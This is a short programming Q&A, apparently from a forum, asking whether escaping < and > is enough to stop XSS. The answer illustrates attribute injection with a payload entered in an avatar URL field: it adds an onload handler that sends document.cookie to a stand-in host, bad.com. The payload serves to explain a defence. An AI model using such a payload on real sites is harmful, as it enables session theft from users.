Is replacing : < and> with < and> enough to prevent XSS injection?

Question

I want to know if entiting the two marks < and > is enough to prevent XSS injections?

And if not, why? And what\'s the best solution?

Answer 1

It depends very much on context.

Check out this example, from a typical forum site...

You may hotlink your avatar image. Enter the full URL.

Malicious user enters in input field

http://www.example.com/image.png" onload="window.location = 'http://www.bad.com/giveme.php?cookie=' + encodeURI(document.cookie) 

There is no encoding there of less than and greater than, but still a big security hole.

With htmlspecialchars(), I found it a good idea to make (or use) a wrapper function of it that casts to a string, provides an easier way to disable double encoding (if necessary) and to ensure it is using the correct character set of your application. Kohana has a great example.